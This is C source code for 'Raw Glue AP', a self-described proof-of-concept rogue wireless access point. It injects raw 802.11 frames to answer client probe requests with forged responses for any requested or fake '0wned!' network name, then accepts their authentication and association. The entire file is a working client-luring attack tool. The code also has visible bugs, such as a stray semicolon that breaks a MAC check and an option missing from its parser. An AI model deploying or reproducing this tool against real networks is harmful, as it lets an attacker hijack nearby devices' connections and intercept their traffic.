/*
 * Raw Glue AP
 *
 * Copyright (c) 2005-2006, Laurent Butti
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 *
 */

/*
 * This tool catches probe requests, send back appropriate probe responses
 * and then tries to catch authentication and association requests. This is
 * a kind of Glue AP which purpose is to catch clients that are actively
 * scanning for any ESSID. This could be implemented in a Wireless IPS tool.
 * Any ESSID is both Null ESSID and pre-configured ESSID usually preferred
 * wireless networks in Wireless Zero Configuration will be caught.
 *
 * All this stuff is done in monitor mode and uses raw injection which is
 * available on some drivers/firmwares.
 *
 * This tool is a proof-of-concept code. Use it at your own risks.
 * It is alpha code that is not fully functional!
 * Do not blame me for bugs and ugly coding style!
 *
 */

#include <stdint.h>
#include <sys/ioctl.h>
#include <netpacket/packet.h>
#include <stdio.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <pcap.h>
#include <getopt.h>

int handle_probe_req(const u_char *packet_data);
int handle_auth_req(const u_char *packet_data);
int handle_asso_req(const u_char *packet_data);
int handle_null_func(const u_char *packet_data);
int handle_data(const u_char *packet_data);
int usage(char *arg0);
void close(int sock);

const char *author = "Laurent Butti";
const char *version = "0.1";

#define PRISM_HEADER 144
#define MAX_SSID_LEN 32

#define WLAN_TAG_PARAM_SIZE 512

#define ARPHRD_IEEE80211 801
#define ARPHRD_IEEE80211_PRISM 802

#define OWNED_MAC "\x30\x77\x6e\x65\x64\x21"
#define OWNED_ESSID "\x30\x77\x6e\x65\x64\x21"
#define BROADCAST "\xff\xff\xff\xff\xff\xff"

/* Structures */
typedef uint64_t u64;
typedef uint32_t u32;
typedef uint16_t u16;
typedef uint8_t u8;

/* Definition of a probe request frame */
struct probe_req {
  u16 frame_control;
  u16 duration;
  u8 da[6];
  u8 sa[6];
  u8 bssid[6];
  u16 seq_ctrl;
  /* Tagged parameters */
  u8 tags[WLAN_TAG_PARAM_SIZE];
} __attribute__ ((packed));

/* Definition of a probe response frame */
struct probe_resp {
  u16 frame_control;
  u16 duration;
  u8 da[6];
  u8 sa[6];
  u8 bssid[6];
  u16 seq_ctrl;
  u64 timestamp;
  u16 beacon_int;
  u16 capab_info;
  /* Tagged parameters */
  u8 tags[WLAN_TAG_PARAM_SIZE];
} __attribute__ ((packed));

/* Definition of an authentication request/response */
struct auth {
  u16 frame_control;
  u16 duration;
  u8 da[6];
  u8 sa[6];
  u8 bssid[6];
  u16 seq_ctrl;
  u16 alg;
  u16 seq;
  u16 status;
  /* We do not support shared key auth */
} __attribute__ ((packed));

/* Definition of an association request */
struct asso_req {
  u16 frame_control;
  u16 duration;
  u8 da[6];
  u8 sa[6];
  u8 bssid[6];
  u16 seq_ctrl;
  u16 capab_info;
  u16 listen_interval;
  u8 tags[WLAN_TAG_PARAM_SIZE];
} __attribute__ ((packed));

/* Definition of an association response */
struct asso_resp {
  u16 frame_control;
  u16 duration;
  u8 da[6];
  u8 sa[6];
  u8 bssid[6];
  u16 seq_ctrl;
  u16 capab_info;
  u16 status;
  u16 aid;
  u8 tags[WLAN_TAG_PARAM_SIZE];
} __attribute__ ((packed));

typedef struct probe_req probe_req_t;
typedef struct probe_resp probe_resp_t;
typedef struct auth auth_t;
typedef struct asso_req asso_req_t;
typedef struct asso_resp asso_resp_t;

/* Global variables */
int ctrl_c = 0;
int isprism = 1;
int isfcs = 0;
int retry = 0;
int windows = 0;
int sock = 0;
int lock = 0;
int seq = 0;
u64 timestamp = 0;

/* Arbitrary long duration value */
u16 duration = 0x7FFF;
u8 channel = 0x01;
u_char *p;
pcap_t *pcap;

/* Have a global ack to optimize delay responses */
/* Plus FCS tail for Atheros */
u8 ack_response[14];

/* Have a global cts to optimize delay responses */
/* Plus FCS tail */
u8 cts[20];

/* Main program */

static void sighandler (int sig)
{
  if (sig == SIGINT) {
    ctrl_c++;
    fprintf(stderr, "Info\t: User interrupt\n");
  }
}

static int open_sock (char *ifname, int sock)
{
  struct sockaddr_ll ll_addr;
  struct ifreq ifr;

  sock = socket (PF_PACKET, SOCK_RAW, ETH_P_ALL);
  if (sock == -1)
    {
      fprintf(stderr, "Error\t: Socket failed\n");
      return (-1);
    }

  ll_addr.sll_family = AF_PACKET;
  ll_addr.sll_protocol = 0;
  ll_addr.sll_halen = ETH_ALEN;

  strncpy(ifr.ifr_name, ifname, IFNAMSIZ);

  if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0)
    {
      fprintf(stderr, "Error\t: ioctl(SIOCGIFINDEX) failed\n");
      return (-1);
    }

  ll_addr.sll_ifindex = ifr.ifr_ifindex;

  if (ioctl(sock, SIOCGIFHWADDR, &ifr) < 0)
    {
      fprintf(stderr, "Error\t: ioctl(SIOCGIFHWADDR) failed\n");
      return (-1);
    }

  memcpy(ll_addr.sll_addr, ifr.ifr_hwaddr.sa_data, ETH_ALEN);

  if (ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
      ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM)
    {
      fprintf( stderr, "Error\t: bad linktype\n");
      return (-1);
    }

  if (bind (sock, (struct sockaddr *)&ll_addr, sizeof(ll_addr)) == -1)
    {
      fprintf(stderr, "Error\t: bind failed\n");
      close(sock);
      return (-1);
    }

  return sock;
}

void pcap_callback (u_char *p, const struct pcap_pkthdr *pkthdr, const u_char *packet_data)
{
    /* Check for retries */
    if (retry == 0) {
        if (packet_data[1 + isprism * PRISM_HEADER] == 0x08) return;
        }

    /* Check for probe request frames */
    if (packet_data[0 + isprism * PRISM_HEADER] == 0x40) {
        /* Probe request should not be ACKed */
        handle_probe_req (packet_data);
        return;
        }

    /* Check for authentication request frames */
    if (packet_data[0 + isprism * PRISM_HEADER] == 0xB0) {
        handle_auth_req (packet_data);
        return;
        }

    /* Check for association request frames */
    if (packet_data[0 + isprism * PRISM_HEADER] == 0x00) {
        handle_asso_req (packet_data);
        return;
        }

    /* Check for null func data frames */
    if (packet_data[0 + isprism * PRISM_HEADER] == 0x48) {
        handle_null_func (packet_data);
        return;
        }
    
    if (packet_data[0 + isprism * PRISM_HEADER] == 0x08) {
        handle_data (packet_data);
        return;
        }

    /* Check for re-association request frames */
    /* FIXME: To be coded */
    if (packet_data[0 + isprism * PRISM_HEADER] == 0x20) {
        fprintf(stderr, "Info\t: Re-Association Request\n");
        // handle_reasso_req (packet_data);
        return;
        }

return;
}

int handle_probe_req (const u_char *packet_data)
{
    char ssid[MAX_SSID_LEN + 1];
    u16 offset1 = 0, offset2 = 0;
    u8 ssid_length, tag_length;
    u8 j;

    /* If it is a probe request, cast it... */
    probe_req_t *probe_request = (probe_req_t *) ((u_char *) (packet_data + isprism * PRISM_HEADER));

    /* Check for destination MAC address */
    if (memcmp(probe_request->da, BROADCAST, 6) != 0)
        {
        if (memcmp(probe_request->da, OWNED_MAC, 6) != 0);
            {
            return (-1);
            }
        }

    /* Retrieve the ESSID */
    /* The first tag is generally the SSID tag */
    /* Customized "unusual" probe requests should bypass this basic check */
    if (probe_request->tags[0] != 0x00) {
        fprintf(stderr, "Info\t: Probe Request with [%.2x] as first tag\n",
                probe_request->tags[0]);
        return -1;
    }

    /* Check for unusual length */ 
    if (probe_request->tags[1] > 0x20) {
        fprintf(stderr, "Info\t: Probe Request with [%.2x] essid length\n",
                probe_request->tags[1]);
        return -1;
    }

    /* Check for WinXP clients */
    if ((probe_request->tags[1] == 0x20) && (windows != 1)) return -1;

    /* Forge the probe response */
    probe_resp_t *probe_response;
    probe_response = (probe_resp_t *) malloc(sizeof(probe_resp_t));

    /* Build probe response frame */
    probe_response->frame_control = 0x0050;
    probe_response->duration = duration;
    memcpy(probe_response->da, &probe_request->sa, 6);
    memcpy(probe_response->sa, OWNED_MAC, 6);
    memcpy(probe_response->bssid, OWNED_MAC, 6);
    probe_response->seq_ctrl = seq;

    /* Check for a coherent timestamp */
    probe_response->timestamp = timestamp;
    probe_response->beacon_int = 0x0064;

    /* Check for capabilities in probe requests? */
    /* FIXME: Send back appropriate probe responses? */
    probe_response->capab_info = 0x0001;
   
    /* Catch Null ESSIDs and send back a customized ESSID */   
    /* FIXME: Clean this ugly section! */
    if (probe_request->tags[1] == 0x00)
        {
        fprintf(stderr, "Info\t: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x Probe Request with [00] essid length\n", probe_request->sa[0], probe_request->sa[1],
                   probe_request->sa[2], probe_request->sa[3],
                   probe_request->sa[4], probe_request->sa[5]);
        /* Send back a specific SSID */
        probe_response->tags[offset1++] = 0x00;
        probe_response->tags[offset1++] = ssid_length = 6;
        memcpy(probe_response->tags + offset1, OWNED_ESSID, 6);
        offset1 += ssid_length;
        }
    else
        {
        /* Send back asked SSID */
        probe_response->tags[offset1++] = 0x00;
        probe_response->tags[offset1++] = ssid_length = probe_request->tags[1];
        memcpy(probe_response->tags + offset1,
               &probe_request->tags[2], ssid_length);

        offset1 += ssid_length;
        }
    
    offset2 = probe_request->tags[1] + 2 ;

    /* Check for supported rates and send back appropriate rates */
    /* FIXME: Clean this ugly section */
    /* FIXME: An option should be to cut and paste probe request tags */
    if (probe_request->tags[offset2++] == 0x01) {
        probe_response->tags[offset1++] = 0x01;
        tag_length = probe_request->tags[offset2++];
        probe_response->tags[offset1++] = tag_length;
        for (j = 0; j < tag_length; j++)
        {
            probe_response->tags[offset1 + j] = probe_request->tags[offset2 + j];
        }
        offset1 += tag_length;
        }
    else
        {
        fprintf(stderr, "Info\t: Probe Request with unsupported data rates\n");
        return -1;
        }

    /* Add channel */
    probe_response->tags[offset1++] = 0x03;
    probe_response->tags[offset1++] = 0x01;
    /* Channel should be linked with real channel */
    probe_response->tags[offset1++] = channel;

    send(sock, probe_response, 36 + offset1, 0);

    free(probe_response);

    /* Update sequence number */
    seq = (((seq & 0xFFF0) >> 4) + 1) << 4;

    /* Update BSS Timestamp with arbitrary value */
    timestamp += 100 * 1024;

    return 0;
}

int handle_auth_req (const u_char *packet_data)
{

    auth_t *auth_request = (auth_t *) ((u_char *) (packet_data + isprism * PRISM_HEADER));
    
    /* Check for frame from STA to OWNED_MAC */
    if (memcmp(auth_request->da, OWNED_MAC, 6) != 0)
        return (-1);

   /* Authentication request should be ACKed */
   /* Construct ACK frame and send it fastly */
   memcpy(ack_response + 4, &packet_data[10 + isprism * PRISM_HEADER], 6);
   send(sock, ack_response, 10, 0);
   fprintf(stderr, "Info\t: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x is being caught (Authentication Response)\n",
   ack_response[4], ack_response[5], ack_response[6],
   ack_response[7], ack_response[8], ack_response[9]); 

    /* Check for sequence authentication */
    if (auth_request->seq > 0x0001) {
        fprintf(stderr, "Info\t: Unsupported sequence authentication\n");
        return -1;
        }

    /* Check for shared key authentication */
    if (auth_request->alg == 0x0002) {
        fprintf(stderr, "Info\t: Unsupported shared key authentication\n");
        return -1;
        }

    auth_t *auth_response;
    auth_response = (auth_t *) malloc(sizeof(auth_t));
    
    auth_response->frame_control = 0xB0;
    /* FIXME: Should use a calculated duration value thanks to request? */
    auth_response->duration = duration;
    memcpy(auth_response->da, &auth_request->sa, 6);
    memcpy(auth_response->sa, &auth_request->da, 6);
    memcpy(auth_response->bssid, &auth_request->bssid, 6);
    auth_response->seq_ctrl = seq;
    auth_response->alg = 0x0000;
    auth_response->seq = 0x0002;
    auth_response->status = 0x0000;

    send(sock, auth_response, sizeof(auth_t), 0);

    free(auth_response);

    /* Update sequence number */
    seq = (((seq & 0xFFF0) >> 4) + 1) << 4;

return 0;
}

int handle_asso_req (const u_char *packet_data)
{
    u16 offset_req = 0, offset_resp = 0;
    u8 tag_length;
    u8 j;

    asso_req_t *asso_request = (asso_req_t *) ((u_char *) (packet_data + isprism * PRISM_HEADER));

    /* Check for frame from STA to OWNED_MAC */
    if (memcmp(asso_request->da, OWNED_MAC, 6) != 0)
        return (-1);

    /* Association request should be ACKed */
    /* Construct ACK frame and send it fastly */
    memcpy(ack_response + 4, &packet_data[10 + isprism * PRISM_HEADER], 6);
    send(sock, ack_response, 10, 0);
    fprintf(stderr, "Info\t: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x is being caught (Association Response)\n",
    ack_response[4], ack_response[5], ack_response[6],
    ack_response[7], ack_response[8], ack_response[9]); 

    /* Retrieve the ESSID */
    /* The first tag is generally the SSID tag */
    /* Customized "unusual" probe requests should bypass this basic check */
    if (asso_request->tags[0] == 0x00)
    {
    /* Check for SSID length */
    if ((asso_request->tags[1] > 0x20) || (asso_request->tags[1] == 0x20))
        {
        fprintf(stderr, "Info\t: Association Request with [%.2x] essid length\n", asso_request->tags[1]);
        return -1;
        }
    }
    else
    {
       fprintf(stderr, "Info\t: Association Request with [%.2x] first tag\n", asso_request->tags[0]);
        return -1;
    }

    offset_req = offset_req + 2 + asso_request->tags[1];

    asso_resp_t *asso_response;
    asso_response = (asso_resp_t *) malloc(sizeof(asso_resp_t));
    
    asso_response->frame_control = 0x10;
    asso_response->duration = duration;
    memcpy(asso_response->da, &asso_request->sa, 6);
    memcpy(asso_response->sa, &asso_request->da, 6);
    memcpy(asso_response->bssid, &asso_request->bssid, 6);
    asso_response->seq_ctrl = seq;
    /* FIXME: */
    asso_response->capab_info = 0x0001;
//    asso_response->capab_info = asso_request->capab_info;
    asso_response->status = 0x0000;
    /* FIXME: Check for aid consistency */
    asso_response->aid = 0xc001;

    /* Check for supported rates and send back appropriate rates */
    /* FIXME: Clean this ugly section */
    /* FIXME: An option should be to cut and paste probe request tags */
    if (asso_request->tags[offset_req++] == 0x01) {
        asso_response->tags[offset_resp++] = 0x01;
        tag_length = asso_request->tags[offset_req++];
        asso_response->tags[offset_resp++] = tag_length;
        for (j = 0; j < tag_length; j++)
        {
            asso_response->tags[offset_resp + j] = asso_request->tags[offset_req + j];
        }
        offset_resp += tag_length;
        }
    else
        {
        fprintf(stderr, "Info\t: Association Request with unsupported data rates\n");
        return -1;
        }

    send(sock, asso_response, 30 + offset_resp, 0);

    free(asso_response);

    /* Update sequence number */
    seq = (((seq & 0xFFF0) >> 4) + 1) << 4;

return 0;
}

int handle_null_func(const u_char *packet_data)
{
    if (memcmp(packet_data + 4 + isprism * PRISM_HEADER, OWNED_MAC, 6) != 0)
        return (-1);

    /* Construct ACK frame and send it fastly */
    memcpy(ack_response + 4, &packet_data[10 + isprism * PRISM_HEADER], 6);
    send(sock, ack_response, 10, 0);
    fprintf(stderr,
            "Info\t: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x Caught (NullFunc)\n",
            ack_response[4], ack_response[5], ack_response[6],
            ack_response[7], ack_response[8], ack_response[9]); 
    return 0;
}

int handle_data(const u_char *packet_data)
{
    if (memcmp(packet_data + 4 + isprism * PRISM_HEADER, OWNED_MAC, 6) != 0)
        return (-1);
    
    fprintf(stderr,
            "Info\t: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x Caught (Data)\n",
            packet_data[10 + isprism * PRISM_HEADER],
            packet_data[11 + isprism * PRISM_HEADER],
            packet_data[12 + isprism * PRISM_HEADER],
            packet_data[13 + isprism * PRISM_HEADER],
            packet_data[14 + isprism * PRISM_HEADER],
            packet_data[15 + isprism * PRISM_HEADER]);

    return 0;
}

int main (int argc, char **argv)
{
    /* options */
    char *ifname = NULL;
    char c;
    u8 flags;
    char err[PCAP_ERRBUF_SIZE];
    u8 cmd[32];
 
    /* General purpose */
    float elapsed_time;
    struct timeval time_start, time_end, delta;

    /* Initialize default values */
    flags = 0;
    sock = 0;
    timestamp = (u64) (rand());
    memset(cmd, 0, sizeof(cmd));
 
    /* Retrieve command line options */
    while ((c = getopt(argc, argv, "hi:d:c:r")) != EOF)
        {
            switch(c)
                {
                    case 'h':
                        usage(argv[0]);
                        return -1;
                    case 'i':
                        if (optarg)
                            {
                            ifname = optarg;
                            break;
                            }
                        else
                            {
                            usage(argv[0]);
                            return -1;
                            }
                    case 'd':
                        if (optarg)
                            {
                            duration = atoi(optarg);
                            break;
                            }
                        else
                            {
                            usage(argv[0]);
                            return (-1);
                            }
                    case 'c':
                        if (optarg)
                            {
                            channel = (u8) (atoi(optarg));
                            break;
                            }
                        else
                            {
                            usage(argv[0]);
                            return (-1);
                            }
                    case 'r':
                        retry = 1;
                        break;
                    case 'w':
                        windows = 1;
                        break;
                    default:
                        usage(argv[0]);
                        return -1;
                }
        }

   printf("\nRaw Glue AP (%s) proof-of-concept code\n"
          "Copyright (c) 2005-2006, %s\n\n"
          , version, author);

   if (ifname == NULL)
        {
        fprintf(stderr, "Error\t: Ifname must be specified\n");
        usage(argv[0]);
        return (-1);
        }

pcap = pcap_open_live(ifname, 512, 1, 1, err);

if (pcap == NULL)
    {
    fprintf(stderr, "Error\t: pcap_open_live failed (%s)\n", err);
    return -1;
    }

pcap_setnonblock(pcap, 1, err);

/* Check datalink for prism headers or not */
switch (pcap_datalink(pcap))
    {
    case DLT_PRISM_HEADER:
        fprintf(stderr, "Info\t: PRISM datalink type\n");
        isprism = 1;
        break;
    case DLT_IEEE802_11:
        fprintf(stderr, "Info\t: IEEE802_11 datalink type\n");
        isprism = 0;
        break;
    default:
        fprintf(stderr, "Error\t: Unknown datalink type\n");
        return -1;
    }

    sock = open_sock(ifname, sock);

    if (sock == -1 )
    {
      fprintf(stderr,
          "Error\t: Cannot open socket\n"
          "Info\t: Must be root with a 802.11 card with RFMON enabled\n");
      return (-1);
    }

    /* Setting max power */
    snprintf(cmd, sizeof(cmd), "iwconfig %s txpower 100mW", ifname);
    system(cmd);

    /* Setting channel */
    snprintf(cmd, sizeof(cmd), "iwconfig %s channel %d", ifname, channel);
    system(cmd);
    
    fprintf(stderr, "Info\t: Starting process on %s\n\n", ifname);
    
    if (gettimeofday(&time_start, NULL) == -1)
    fprintf(stderr, "Error\t: Can not set timer\n");
    
    /* Initialize ACK response */
    memset(ack_response, 0, 14);
    memcpy(ack_response, "\xD4\x00\x00\x00", 4);

    /* Initialize CTS response */
    memset(cts, 0, 20);
    memcpy(cts, "\xC4\x00", 2);
    memcpy(cts + 2, &duration, 2); 
    memcpy(cts + 10, OWNED_MAC, 6);

    /* Main loop for injection */
    while (ctrl_c == 0)
        {
        signal(SIGINT, sighandler);
        pcap_dispatch(pcap, 1, pcap_callback, (u_char *) p);
        }

  if (gettimeofday(&time_end, NULL) == -1)
    fprintf(stderr, "Error\t: Can not set timer\n");

  (&delta)->tv_sec = (&time_end)->tv_sec - (&time_start)->tv_sec;
  (&delta)->tv_usec = (&time_end)->tv_usec - (&time_start)->tv_usec;
  if ((&delta)->tv_usec < 0)
    {
      (&delta)->tv_sec--;
      (&delta)->tv_usec += 1000000;
    }

  elapsed_time = (float)(delta.tv_sec) + (float)(delta.tv_usec) / 1000000;

  printf("RGlueAP\t:\n"
         "Time\t: %f seconds"
         , elapsed_time);    

  close(sock);
  pcap_close(pcap);

  return 1;
}

int usage (char *arg0)
{
    printf("usage: %s [-h] [-i <ifname>] [-d <duration>] [-c <channel>] [-r] [-m <mac>]\n"
           "\t-h\t\t: display this message\n"
           "\t-i <ifname>\t: select interface for raw injection\n"
           "\t-d <duration>\t: give a duration value (default: 0x7FFF)\n"
           "\t-c <channel>\t: give a channel (default: 1)\n"
           "\t-w\t\t: catch WinXP clients (default: no)\n"
           "\t-r\t\t: answer to retries (default: no)\n"
           "\t-m <mac>\t: dest. mac xx:..:xx (default: 0wned!) [unsupported]\n"
           "\t-e <essid>\t: essid (default: 0wned!) [unsupported]\n"
           , arg0);
    return -1;
}
